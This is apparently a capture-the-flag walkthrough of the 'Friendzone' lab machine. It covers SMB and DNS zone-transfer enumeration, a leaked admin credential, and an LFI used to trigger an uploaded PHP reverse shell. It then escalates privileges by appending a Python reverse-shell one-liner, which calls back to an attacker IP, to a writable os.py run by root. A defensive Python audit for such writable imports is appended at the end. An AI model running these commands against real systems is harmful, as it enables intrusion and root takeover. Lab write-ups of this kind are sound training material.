Ping

Nmap Scans

mapit 10.10.10.123

Nmap Default Scan

Nmap Service and Script Scan

Nmap All port Scan

On Port 80 http://10.10.10.123

Smb Enumeration using Smbclient

smbclient -U '' -L \\\\10.10.10.123\\\\

If you can’t access the share, play with the slashes

smbclient \\\\10.10.10.123\\Development\\

Nothing in Development

Can’t get a command prompt on the Files share

Share general

smbclient \\\\10.10.10.123\\general\\

Will analyse the file creds.txt, which contains admin:WORKWORKHhallelujah@#

Will try this with FTP first. Didn’t work…!

Gobuster Scan

gobuster dir -u http://10.10.10.123 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x php,html,txt,bak,aspx -s 200,204,301,302,307,403 -k --status-codes "" -o gobuster.txt

We can see something interesting

On http://10.10.10.123/robots.txt hahahahahaha…:)

On http://10.10.10.123/wordpress nothing here as well

But DNS port 53 is open, so will check whether there are more domain names, because we have a password for admin but don’t know where to use it.

Use this link for DNS enumeration: https://book.hacktricks.xyz/network-services-pentesting/pentesting-dns

We can already see a domain name, friendzone.red, in the nmap scan; will add this to our hosts file

Will use dig to attempt a DNS zone transfer

dig axfr @10.10.10.123 friendzone.red

Now we have a lot of domain names

Added all newly found domain names to the hosts file

On https://friendzone.red/

On https://administrator1.friendzone.red/

After login, it says visit /dashboard.php: https://administrator1.friendzone.red/dashboard.php

On https://uploads.friendzone.red/

Nothing on hr

Uploaded a simple jpg file

Now will follow this

Will jump to Initial foothold…!

Will use the default URL https://administrator1.friendzone.red/dashboard.php?%20image_id=a.jpg&pagename=timestamp. I think pagename is vulnerable to LFI

We have already seen the SMB shares, so there is a chance the other two shares are under /etc

Will check that..!

Will put a PHP reverse shell there, then trigger rev.php

It worked, but only without the extension: https://administrator1.friendzone.red/dashboard.php?%2520image_id=a.jpg&pagename=/etc/Development/rev

Will check our listener

Upgraded my shell using python

python3 -c 'import pty; pty.spawn("/bin/bash")'

User.txt

Will Jump to Privilege Escalation…!

I have launched pspy and found that reporter.py is run by root periodically

Will check that. It imports os, and I have already seen os.py while running linpeas.sh

So os.py is writable

OK, then will replace os.py with our reverse shell one-liner

echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.3",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")' >> os.py

Added this at the end

And waited for shell as root and got it
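The root cause here is a root-run job importing a module whose file permissions let an unprivileged user change it. As an added example (not code from this writeup), the following Python audit statically lists a script's imports, resolves each to the file the interpreter would load, and flags any whose file or parent directory is group- or world-writable; the reporter.py and the os.py stand-in it checks are constructed inside a temporary directory.

```python
import ast
import importlib.machinery
import os
import sys
import tempfile

def imported_modules(script_path):
    """Top-level module names a script imports, found statically with ast."""
    with open(script_path) as f:
        tree = ast.parse(f.read(), filename=script_path)
    names = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            names.update(a.name.split(".")[0] for a in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.add(node.module.split(".")[0])
    return sorted(names)

def writable_by_non_owner(path):
    """True when the group or world write bit is set (POSIX ACLs not inspected)."""
    return bool(os.stat(path).st_mode & 0o022)

def hijackable_imports(script_path, search_path=None):
    """Resolve each import to the file Python would load (script directory first,
    then sys.path, like the interpreter) and flag files or parent directories a
    non-owner can write. Built-ins such as sys have no file and resolve to None."""
    if search_path is None:
        search_path = [os.path.dirname(os.path.abspath(script_path))] + sys.path
    result = {}
    for name in imported_modules(script_path):
        spec = importlib.machinery.PathFinder.find_spec(name, search_path)
        origin = spec.origin if spec is not None and spec.has_location else None
        flag = bool(origin) and os.path.isfile(origin) and (
            writable_by_non_owner(origin) or writable_by_non_owner(os.path.dirname(origin)))
        result[name] = {"origin": origin, "hijackable": flag}
    return result

def demo_findings():
    """Audit a constructed sample: reporter.py importing os next to a writable os.py."""
    with tempfile.TemporaryDirectory() as d:
        fake_os = os.path.join(d, "os.py")
        with open(fake_os, "w") as f:
            f.write("# constructed stand-in module\n")
        os.chmod(fake_os, 0o666)  # the weak permission the audit should catch
        script = os.path.join(d, "reporter.py")
        with open(script, "w") as f:
            f.write("import os\nimport sys\nfrom json import dumps\n")
        return hijackable_imports(script, [d])

if __name__ == "__main__":
    print(demo_findings())
```

Run it against a real scheduled script with the default search path (hijackable_imports("/path/to/reporter.py")) to check the interpreter's actual module files rather than the constructed sample.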

Root.txt

Done with Friendzone…:)